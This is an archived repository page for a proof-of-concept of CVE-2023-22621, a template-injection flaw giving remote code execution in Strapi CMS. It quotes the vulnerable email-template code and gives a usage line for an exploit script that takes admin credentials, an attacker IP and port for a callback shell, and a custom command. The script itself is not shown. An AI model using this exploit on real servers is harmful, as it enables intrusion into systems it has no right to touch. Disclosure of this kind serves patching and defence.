Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22621 PoC — Strapi 注入漏洞

Source
https://github.com/sofianeelhor/CVE-2023-22621-POC
Associated Vulnerability
Title:Strapi 注入漏洞 (CVE-2023-22621)
Description:Strapi是一套开源的内容管理系统(CMS)。 Strapi 4.5.5之前版本存在安全漏洞,攻击者利用该漏洞可以将在服务器上执行代码的精心设计的有效载荷注入到电子邮件模板中,从而绕过本应阻止代码执行的验证检查。
Description
CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5
Readme
# CVE-2023-22621-POC
CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5

The function `sendTemplatedEmail` renders email templates into HTML content using the [lodash](https://lodash.com/docs/)
 template engine that evaluates JavaScript code within templates. ref: https://twitter.com/rootxharsh/status/1268181937127997446?lang=en
 
 ```node
'use strict';

const _ = require('lodash');

const getProviderSettings = () => {
  return strapi.config.get('plugin.email');
};

const send = async (options) => {
  return strapi.plugin('email').provider.send(options);
};

/**
 * fill subject, text and html using lodash template
 * @param {object} emailOptions - to, from and replyto...
 * @param {object} emailTemplate - object containing attributes to fill
 * @param {object} data - data used to fill the template
 * @returns {{ subject, text, subject }}
 */
const sendTemplatedEmail = (emailOptions = {}, emailTemplate = {}, data = {}) => {
  const attributes = ['subject', 'text', 'html'];
  const missingAttributes = _.difference(attributes, Object.keys(emailTemplate));
  if (missingAttributes.length > 0) {
    throw new Error(
      `Following attributes are missing from your email template : ${missingAttributes.join(', ')}`
    );
  }
```

![POC](https://cdn.discordapp.com/attachments/1028021191568535623/1100454965555761163/poc3.gif)


## Usage
`python3 CVE-2023-22621.py -url http://strapi.local:1337/ -u "admin@strapi.local" -p "$Securep4ss" -ip 127.0.0.1 -port 4545`
```
options:
  -h, --help            show this help message and exit
  -url URL              URL of the Strapi instance
  -u U                  Admin username
  -p P                  Admin password
  -ip IP                Attacker IP
  -port PORT            Attacker port
  -url_redirect         URL to redirect after email confirmation
  -custom CUSTOM        Custom shell command to execute
```

# Credits
All credits goes to original vulnerability [finder](https://twitter.com/GhostCcamm), checkout his awesome write-up [here](https://www.ghostccamm.com/blog/multi_strapi_vulns/index.html#detecting-remote-code-execution-cve-2023-22621)
File Snapshot

 [4.0K]  /data/pocs/ef5a656d85ce9796bce1a71ca93f6a4d14b9f812
├── [4.4K]  poc.py
└── [2.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.